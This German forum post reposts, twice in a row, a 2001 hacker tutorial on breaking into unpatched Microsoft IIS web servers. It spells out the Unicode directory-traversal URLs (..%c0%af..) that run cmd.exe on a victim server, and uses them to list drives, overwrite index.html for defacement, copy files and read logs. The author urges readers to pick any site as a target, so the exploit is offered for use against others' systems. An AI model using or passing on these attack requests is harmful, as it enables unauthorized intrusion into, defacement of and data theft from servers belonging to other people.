eleven12
09.12.2006, 13:43
Ich hab in der SuFu ma nix passendes gefunden also post ich's mal:
HOW TO HACK AN IIS WEBSERVER
Author: B@st@rd
Mail: Dark_Revenge@gmx.at
ICQ: 56580202
Date: 08.03.2001
Title: How to hack an IIS Web Server
Crew: Open Secure Crew
Url: http://www.opensecure.de
Note:
Der Author übernimmt keinerlei Schäden und Verantwortung, die durch den Inhalt dieses Tuts hervorgehen. Dieses Tutorial soll auch keine Anregung zum Hacken von WebServer sein, sondern jediglich Darstellen wie man auf leichteste Weise einen WebServer unter Win NT bzw Win 2000 manipulieren kann, und das nur mit 1 Programm das standardmäßig bei Windoof dabei ist........der Internet Explorer.
Achja, ihr solltet natürlich auch MSDOS Befehle können, das ist Vorraussetzung für den Hack. Aja und nix umändern oder kopieren und sagen ihr hättet das Tut geschrieben. Wenn ihr was ändern wollt oder so, schickt mir ne Mail.
Wichtig: Die hier vorgestellte Methode funktioniert nur, wenn das Servicepack 1 (oder irgendein anderes) NOCH NICHT am Server installiert wurde.
Vorwort:
HI, ok, also der Titel klingt ja schon geil, aber ich möchte euch erklären warum dieser brisante Titel. Hört sich ja kewl an, ist es auch, und nicht all zu schwer.
Aber erst mal der Grund für dieses Tutorial.......... Also wenn ich im Netz so herumsurfe, lese ich auf den meisten Seiten in der Tutorial Sektion immer FTP Hacking oder HOW TO HACK AN FTP... Mann, da platzt mir echt der Kragen wenn ich so eine Scheiße lese, denn die darin vorgestellten Möglichkeiten sind schon so alt wie ich selber (ne so alt bin ich nu auch wieder nicht)
Das man mit der PHF Technik das Passwortfile ziehen kann is einer dieser viele schwachsinnigen Texte die man oft lesen kann. Aber auch das man die Konsole (MSDOS Eingabeaufforderung) starten soll, sich mit username: anonymous | passwort: irgend ne mailadresse auf den FTP connecten und dann das Passwortfile ziehen kann, ja auch das shadow passwortfile......
Das ist der größte Schwachsinn auf Gottes Erdboden.... Ja sicherlich kann man sich auf jeden FTP also anonymous connecten (falls ein Guest Login erlaubt ist), aber glaubt ihr echt, das die Admins so dämlich sind, und euch als Guest das Passwortfile ziehen lassen???????? Sicher nicht, denn ihr könnt nicht mal (normalerweise, Aussnahmen gibt’s immer) die Ebene verlassen, und wenn ihr gerade mal ein .pwd File seht, tja, spart euch einfach das ziehen, den das ist nur eine Täuschung, sicherlich könnt ihr euch die Arbeit machen und das „falsche“ .pwd File ziehen und euch dann noch mit einem PW Cracker dransetzen, nur die Arbeit die ihr euch da antut is für die Katz.......
Durch Exploits und Bufferoverflows kommt ihr im Grunde genommen in (fast) jedes System. Auch lese ich oft über den sogenannten SendMail Bug, gut da ist wirklich was wahres dran, aber achtet darauf, welche Version von SendMail sich am Server befindet. In den meisten Tuts ist die Rede von Version 8.8.4, also aufpassen....
So nun genug gequatscht, ich wollt euch nur einen Überblick geben, damit ihr nicht auf die Nase fallt, und vielleicht was probiert, was sowieso hoffnungslos ist, eben weil es schon veraltet ist.
Nun gut, jetzt zur Sache......
Also, dieses Tutorial handelt vom Hacken von Win NT WebServern auf denen der IIS (Internet Information Service) Dienst installiert ist. IIS wird von Firmen und dergleichen benutzt, und muß installiert sein wenn man einen WebServer unter Win NT benutzt. IIS gibt’s auch unter Win 2000 Server, daher sollte die hier beschriebene Methode auch bei Win 2000 Servern funktionieren.
Aja, das soll zwar ein Tut für Anfänger sein, aber Vorkentnisse solltet ihr schon besitzen, ich erkläre nicht zb. was Unicodes sind oder dergleichen...
Gut, also die Methode basiert ausschließlich auf Unicodes
Voraussetzung dafür ist natürlich das IIS auf dem jeweiligen Server installiert wurde (geht auch ned anders, sonst könnten sie ja keinen Web Server unter Win NT / 2000 betreiben, und das wichtigste, das der „BUG“ noch existiert und nicht gepatcht wurde....
Gut dann mal los, also sucht euch mal irgendeine Seite im Netz, wenn ihr eine gefunden habt, die euren Wünschen entspricht +gg+ probiert mal folgendes:
Angenommen die Seite ist nun: http://www.victim.com (das is nur ne PsydoSite)
Dann müßt ihr die sogenannte BIN DIR eingeben, jaja was is nun wieder ne BIN DIR....
Also ne BIN DIR ist kurz gesagt, ne Directory/Verzeichnis wo man executable Files ausführen kann (.exe)
Jetzt probiert ihr einfach folgende BIN DIR’s durch, eine davon sollte sicher gehen, ausser der Server wurde schon gepatched:
1) msadc
2) _vti_bin
3) scripts
4) IISADMPWD
Also für die ganz Dummen: http://www.victim.com/msadc | http://www.victim.com/_vti_bin etc.
Gut aber die Befehlskette reicht natürlich noch nicht aus um einen WebServer zu knacken, wär ja zu schön
Also hängen wir an http://www.victim.com/_vti_bin noch die Kette /..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ dazu.
Hmm, ja ihr kennt euch jetzt Nüsse aus, kann ich mir denken +gg+
Ok hier ne kleine und kurze Erläuterung:
..%c0%af../..%c0%af../..%c0%af..
Wenn wir stattdessen nur %c0 = \ %af = / schreiben, würde ein Problem auftreten, und zwar das uns der Zugriff verweigert werden würde, weil der IIS versucht den String zu lesen, aber es irgendwie nicht ganz check und uns die blöde Fehlermeldung ausgibt, und das ist ja genau das was wir nicht wollen, oder?
Nun hat ..%c0%af../..%c0%af../..%c0%af.. die Bedeutung, das wir das ganze nun in UTF 8 in 128-256 schreiben, sodas uns der IIS vorbeiläßt (juhu gewonnen). Ich weiß nicht ob es irgendwie verständlich ist, wenn nicht auch kein Problem, ich weiß nämlich nicht wie ich es erklären soll....
Winnt/system32 brauch ich wohl nicht zu erklären, das sind einfach die Verzeichnisse am Web Server....
cmd.exe ist ganz wichtig für uns, denn das ist die Kommando Zeile, mit der wir eigentlich jede Art von Befehlen ausführen können (wird dann weiter unten deutlich wenn ihr es einfach mal nachvollzieht)
So, jetzt sollte die Url so aussehen:
http://www.victim.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
Theoretisch solltet ihr nun das C: Laufwerk des Servers sehen, mag ja interessant sein, aber guckt doch einfach mal, ob ein D: Laufwerk vorhanden ist.
Dazu gebt ihr im Internetexplorer folgendes ein:
http://www.victim.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+d\
Und schwupps, habt ihr nun auch Einsicht auf die D: Platte, da liegen bei manchen Servern eine Reihe von WebPages die gehostet werden. Ihr erkennt das daran, das ihr nun ein paar bzw. ne Menge IP Adressen seht die als Ordner angegeben sind.
Hier ein paar Beispiel wie das aussehen könnte:
10/27/98 05:59p <DIR> 208.233.90.10
09/05/00 04:57p <DIR> 208.233.90.100
09/04/98 06:52p <DIR> 208.233.90.101
11/07/00 06:00a <DIR> 208.233.90.102
09/05/00 04:57p <DIR> 208.233.90.103
09/24/98 07:57a <DIR> 208.233.90.104
09/21/00 08:23p <DIR> 208.233.90.105
01/29/01 05:50p <DIR> 208.233.90.106
09/05/00 04:56p <DIR> 208.233.90.107
9/05/00 04:56p <DIR> 208.233.90.108
Anmerkung: Das obengezeigte ist nur ein Beispiel wie es aussehen könnte, also ned drauf verlassen, auf einem IIS Server sind die Standard Webfiles unter folgendem Namen zu finden: default.html | index.html oder diverse .asp Files, also Augen aufmachen....
Ok das sieht ja wunderbar aus +freu+, nun öffnet ihr ein neues Fenster im InetExplorer und schreibt zb. http://208.233.90.108 , nun seht ihr ne Homepage die auf diesen Server gehostet wird. Im Grunde genommen, habt ihr den WebServer nun schon geknackt, denn ihr könnt jetzt diverse Sachen ausführen etc. Eben alles was euer Herz begehrt.
Wie schon mehrmals erwähnt, ist das oben ein Beispiel, solltet ihr wirklich mal nen WebServer „knacken“ und die Ordner ned so aussehen wie oben, tja keine Angst, dann sucht ihr euch die entsprechenden Files (findet ihr unter Anmerkung) und verändert sie dementsprechend
Als kleine Anregung wäre da das Echo Command vorzustellen:
Probiert mal in eurer Konsole (MSDOS Eingabeaufforderung) folgendes einzugeben:
echo win sukks>file.txt
Nun solltet ihr auf eurer C: Platte ein Textfile haben, macht es einfach mal auf und guckt hinein, wow da steht win sukks drin +freu+
Nun probiert das gleiche an einem File (.txt oder .bat) das auf eurer Platte schon vorhanden ist. Keine Angst, ihr könnt ruhig die Autoexec.bat nehmen, es passiert schon nichts.
Also, echo win sukks>autoexec.bat
Guckt euch jetzt mal eure Autoexec.bat an, ja da steht nun ne Zeile mit win sukks drin, versteht ihr was ich damit sagen will?
Sucht einfach nach nem .html file und benutzt die oben genannte Methode um die .html Files zu editieren
Mal ein paar Beispiele dazu:
http://www.victim.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+win+sukks+>+d:\199.999.99.99\index.html
Könnte ne Fehlermeldung kommen, schreckt uns aber nicht ab, weiter im Text
Weiteres:
http://www.xxx.de/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+d:\Inetpub\wwwroot\index.html+d:\Inetpub\Te st\index.txt
Damit kopiert ihr das index.html File auf die D: Platte in das Inetpub/Test Verzeichnis und benennt es gleich in index.txt um. (Brave Hacker löschen nichts sondern benennen die Files um)
Da wär noch zu sagen, ihr könnt nur einzelne Files kopieren, keine Ordner aber noch ein Tipp von mir, es gibt ne Methode um an alle Files ranzukommen. Mit der type Anweisung (weiter unten) könnt ihr euch zwar .txt, .asp usw. angucken, aber keine .log files, das is irgendwie scheiße, aber es gibt Abhilfe Und zwar wählt ihr den copy Befehl und kopiert das .log File einfach in das Inetpub Verzeichnis bzw. in den entsprechenden Ordner (d.h wenn unter Inetpub dann noch mehrere Ordner sind, zb. www.fuck.de und www.sukker.de dann sucht ihr euch einen Ordner aus und kopiert das Logfile da rein... Habt ihr das geschafft, öffnet ihr einfach euren Internet Explorer und geb zb. ein:
http://www.fuck.de/name_des_Logfiles und schwupps könnt ihr euch das Logfile bequem saugen...
Als letztes wäre noch der Typ Befehl zum anzeigen von .txt Files usw.
http://www.xxx.de/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+d:\Inetpub\www.fuck.de\note.txt
Damit könnt ihr euch diverse .txt Files bequem angucken.....
Um ne Übersicht der Befehle zu bekommen, öffnet ihr einfach eure MSDOS Box (Eingabeaufforderung) und schreibt help hinein, dann bekommt ihr ne Auflistung aller Befehle
So, viel Spaß beim IIS Server hacken, aja bevor ichs vergesse, solltet ihr nen Teil ned kapiert haben, keine Angst, demnächst wird ein Proggy auf der Site von OSC oben sein, das euch die Drecksarbeit ein bisschen erleichtert, also schön brav regelmäßig bei OpenSecure.de nachgucken.
Euer B@st@rd
Greetz to: ExRevel, Overflow, Clone, Slayer, pHaDy, NaTaS, Pacman, speedy, cdr
Group Greeting: OpenSecure, Buschhacker, KryptoCrew, Alldas and all i forgot
HOW TO HACK AN IIS WEBSERVER
Author: B@st@rd
Mail: Dark_Revenge@gmx.at
ICQ: 56580202
Date: 08.03.2001
Title: How to hack an IIS Web Server
Crew: Open Secure Crew
Url: http://www.opensecure.de
Note:
Der Author übernimmt keinerlei Schäden und Verantwortung, die durch den Inhalt dieses Tuts hervorgehen. Dieses Tutorial soll auch keine Anregung zum Hacken von WebServer sein, sondern jediglich Darstellen wie man auf leichteste Weise einen WebServer unter Win NT bzw Win 2000 manipulieren kann, und das nur mit 1 Programm das standardmäßig bei Windoof dabei ist........der Internet Explorer.
Achja, ihr solltet natürlich auch MSDOS Befehle können, das ist Vorraussetzung für den Hack. Aja und nix umändern oder kopieren und sagen ihr hättet das Tut geschrieben. Wenn ihr was ändern wollt oder so, schickt mir ne Mail.
Wichtig: Die hier vorgestellte Methode funktioniert nur, wenn das Servicepack 1 (oder irgendein anderes) NOCH NICHT am Server installiert wurde.
Vorwort:
HI, ok, also der Titel klingt ja schon geil, aber ich möchte euch erklären warum dieser brisante Titel. Hört sich ja kewl an, ist es auch, und nicht all zu schwer.
Aber erst mal der Grund für dieses Tutorial.......... Also wenn ich im Netz so herumsurfe, lese ich auf den meisten Seiten in der Tutorial Sektion immer FTP Hacking oder HOW TO HACK AN FTP... Mann, da platzt mir echt der Kragen wenn ich so eine Scheiße lese, denn die darin vorgestellten Möglichkeiten sind schon so alt wie ich selber (ne so alt bin ich nu auch wieder nicht)
Das man mit der PHF Technik das Passwortfile ziehen kann is einer dieser viele schwachsinnigen Texte die man oft lesen kann. Aber auch das man die Konsole (MSDOS Eingabeaufforderung) starten soll, sich mit username: anonymous | passwort: irgend ne mailadresse auf den FTP connecten und dann das Passwortfile ziehen kann, ja auch das shadow passwortfile......
Das ist der größte Schwachsinn auf Gottes Erdboden.... Ja sicherlich kann man sich auf jeden FTP also anonymous connecten (falls ein Guest Login erlaubt ist), aber glaubt ihr echt, das die Admins so dämlich sind, und euch als Guest das Passwortfile ziehen lassen???????? Sicher nicht, denn ihr könnt nicht mal (normalerweise, Aussnahmen gibt’s immer) die Ebene verlassen, und wenn ihr gerade mal ein .pwd File seht, tja, spart euch einfach das ziehen, den das ist nur eine Täuschung, sicherlich könnt ihr euch die Arbeit machen und das „falsche“ .pwd File ziehen und euch dann noch mit einem PW Cracker dransetzen, nur die Arbeit die ihr euch da antut is für die Katz.......
Durch Exploits und Bufferoverflows kommt ihr im Grunde genommen in (fast) jedes System. Auch lese ich oft über den sogenannten SendMail Bug, gut da ist wirklich was wahres dran, aber achtet darauf, welche Version von SendMail sich am Server befindet. In den meisten Tuts ist die Rede von Version 8.8.4, also aufpassen....
So nun genug gequatscht, ich wollt euch nur einen Überblick geben, damit ihr nicht auf die Nase fallt, und vielleicht was probiert, was sowieso hoffnungslos ist, eben weil es schon veraltet ist.
Nun gut, jetzt zur Sache......
Also, dieses Tutorial handelt vom Hacken von Win NT WebServern auf denen der IIS (Internet Information Service) Dienst installiert ist. IIS wird von Firmen und dergleichen benutzt, und muß installiert sein wenn man einen WebServer unter Win NT benutzt. IIS gibt’s auch unter Win 2000 Server, daher sollte die hier beschriebene Methode auch bei Win 2000 Servern funktionieren.
Aja, das soll zwar ein Tut für Anfänger sein, aber Vorkentnisse solltet ihr schon besitzen, ich erkläre nicht zb. was Unicodes sind oder dergleichen...
Gut, also die Methode basiert ausschließlich auf Unicodes
Voraussetzung dafür ist natürlich das IIS auf dem jeweiligen Server installiert wurde (geht auch ned anders, sonst könnten sie ja keinen Web Server unter Win NT / 2000 betreiben, und das wichtigste, das der „BUG“ noch existiert und nicht gepatcht wurde....
Gut dann mal los, also sucht euch mal irgendeine Seite im Netz, wenn ihr eine gefunden habt, die euren Wünschen entspricht +gg+ probiert mal folgendes:
Angenommen die Seite ist nun: http://www.victim.com (das is nur ne PsydoSite)
Dann müßt ihr die sogenannte BIN DIR eingeben, jaja was is nun wieder ne BIN DIR....
Also ne BIN DIR ist kurz gesagt, ne Directory/Verzeichnis wo man executable Files ausführen kann (.exe)
Jetzt probiert ihr einfach folgende BIN DIR’s durch, eine davon sollte sicher gehen, ausser der Server wurde schon gepatched:
1) msadc
2) _vti_bin
3) scripts
4) IISADMPWD
Also für die ganz Dummen: http://www.victim.com/msadc | http://www.victim.com/_vti_bin etc.
Gut aber die Befehlskette reicht natürlich noch nicht aus um einen WebServer zu knacken, wär ja zu schön
Also hängen wir an http://www.victim.com/_vti_bin noch die Kette /..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ dazu.
Hmm, ja ihr kennt euch jetzt Nüsse aus, kann ich mir denken +gg+
Ok hier ne kleine und kurze Erläuterung:
..%c0%af../..%c0%af../..%c0%af..
Wenn wir stattdessen nur %c0 = \ %af = / schreiben, würde ein Problem auftreten, und zwar das uns der Zugriff verweigert werden würde, weil der IIS versucht den String zu lesen, aber es irgendwie nicht ganz check und uns die blöde Fehlermeldung ausgibt, und das ist ja genau das was wir nicht wollen, oder?
Nun hat ..%c0%af../..%c0%af../..%c0%af.. die Bedeutung, das wir das ganze nun in UTF 8 in 128-256 schreiben, sodas uns der IIS vorbeiläßt (juhu gewonnen). Ich weiß nicht ob es irgendwie verständlich ist, wenn nicht auch kein Problem, ich weiß nämlich nicht wie ich es erklären soll....
Winnt/system32 brauch ich wohl nicht zu erklären, das sind einfach die Verzeichnisse am Web Server....
cmd.exe ist ganz wichtig für uns, denn das ist die Kommando Zeile, mit der wir eigentlich jede Art von Befehlen ausführen können (wird dann weiter unten deutlich wenn ihr es einfach mal nachvollzieht)
So, jetzt sollte die Url so aussehen:
http://www.victim.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
Theoretisch solltet ihr nun das C: Laufwerk des Servers sehen, mag ja interessant sein, aber guckt doch einfach mal, ob ein D: Laufwerk vorhanden ist.
Dazu gebt ihr im Internetexplorer folgendes ein:
http://www.victim.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+d\
Und schwupps, habt ihr nun auch Einsicht auf die D: Platte, da liegen bei manchen Servern eine Reihe von WebPages die gehostet werden. Ihr erkennt das daran, das ihr nun ein paar bzw. ne Menge IP Adressen seht die als Ordner angegeben sind.
Hier ein paar Beispiel wie das aussehen könnte:
10/27/98 05:59p <DIR> 208.233.90.10
09/05/00 04:57p <DIR> 208.233.90.100
09/04/98 06:52p <DIR> 208.233.90.101
11/07/00 06:00a <DIR> 208.233.90.102
09/05/00 04:57p <DIR> 208.233.90.103
09/24/98 07:57a <DIR> 208.233.90.104
09/21/00 08:23p <DIR> 208.233.90.105
01/29/01 05:50p <DIR> 208.233.90.106
09/05/00 04:56p <DIR> 208.233.90.107
9/05/00 04:56p <DIR> 208.233.90.108
Anmerkung: Das obengezeigte ist nur ein Beispiel wie es aussehen könnte, also ned drauf verlassen, auf einem IIS Server sind die Standard Webfiles unter folgendem Namen zu finden: default.html | index.html oder diverse .asp Files, also Augen aufmachen....
Ok das sieht ja wunderbar aus +freu+, nun öffnet ihr ein neues Fenster im InetExplorer und schreibt zb. http://208.233.90.108 , nun seht ihr ne Homepage die auf diesen Server gehostet wird. Im Grunde genommen, habt ihr den WebServer nun schon geknackt, denn ihr könnt jetzt diverse Sachen ausführen etc. Eben alles was euer Herz begehrt.
Wie schon mehrmals erwähnt, ist das oben ein Beispiel, solltet ihr wirklich mal nen WebServer „knacken“ und die Ordner ned so aussehen wie oben, tja keine Angst, dann sucht ihr euch die entsprechenden Files (findet ihr unter Anmerkung) und verändert sie dementsprechend
Als kleine Anregung wäre da das Echo Command vorzustellen:
Probiert mal in eurer Konsole (MSDOS Eingabeaufforderung) folgendes einzugeben:
echo win sukks>file.txt
Nun solltet ihr auf eurer C: Platte ein Textfile haben, macht es einfach mal auf und guckt hinein, wow da steht win sukks drin +freu+
Nun probiert das gleiche an einem File (.txt oder .bat) das auf eurer Platte schon vorhanden ist. Keine Angst, ihr könnt ruhig die Autoexec.bat nehmen, es passiert schon nichts.
Also, echo win sukks>autoexec.bat
Guckt euch jetzt mal eure Autoexec.bat an, ja da steht nun ne Zeile mit win sukks drin, versteht ihr was ich damit sagen will?
Sucht einfach nach nem .html file und benutzt die oben genannte Methode um die .html Files zu editieren
Mal ein paar Beispiele dazu:
http://www.victim.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+win+sukks+>+d:\199.999.99.99\index.html
Könnte ne Fehlermeldung kommen, schreckt uns aber nicht ab, weiter im Text
Weiteres:
http://www.xxx.de/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+d:\Inetpub\wwwroot\index.html+d:\Inetpub\Te st\index.txt
Damit kopiert ihr das index.html File auf die D: Platte in das Inetpub/Test Verzeichnis und benennt es gleich in index.txt um. (Brave Hacker löschen nichts sondern benennen die Files um)
Da wär noch zu sagen, ihr könnt nur einzelne Files kopieren, keine Ordner aber noch ein Tipp von mir, es gibt ne Methode um an alle Files ranzukommen. Mit der type Anweisung (weiter unten) könnt ihr euch zwar .txt, .asp usw. angucken, aber keine .log files, das is irgendwie scheiße, aber es gibt Abhilfe Und zwar wählt ihr den copy Befehl und kopiert das .log File einfach in das Inetpub Verzeichnis bzw. in den entsprechenden Ordner (d.h wenn unter Inetpub dann noch mehrere Ordner sind, zb. www.fuck.de und www.sukker.de dann sucht ihr euch einen Ordner aus und kopiert das Logfile da rein... Habt ihr das geschafft, öffnet ihr einfach euren Internet Explorer und geb zb. ein:
http://www.fuck.de/name_des_Logfiles und schwupps könnt ihr euch das Logfile bequem saugen...
Als letztes wäre noch der Typ Befehl zum anzeigen von .txt Files usw.
http://www.xxx.de/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+d:\Inetpub\www.fuck.de\note.txt
Damit könnt ihr euch diverse .txt Files bequem angucken.....
Um ne Übersicht der Befehle zu bekommen, öffnet ihr einfach eure MSDOS Box (Eingabeaufforderung) und schreibt help hinein, dann bekommt ihr ne Auflistung aller Befehle
So, viel Spaß beim IIS Server hacken, aja bevor ichs vergesse, solltet ihr nen Teil ned kapiert haben, keine Angst, demnächst wird ein Proggy auf der Site von OSC oben sein, das euch die Drecksarbeit ein bisschen erleichtert, also schön brav regelmäßig bei OpenSecure.de nachgucken.
Euer B@st@rd
Greetz to: ExRevel, Overflow, Clone, Slayer, pHaDy, NaTaS, Pacman, speedy, cdr
Group Greeting: OpenSecure, Buschhacker, KryptoCrew, Alldas and all i forgot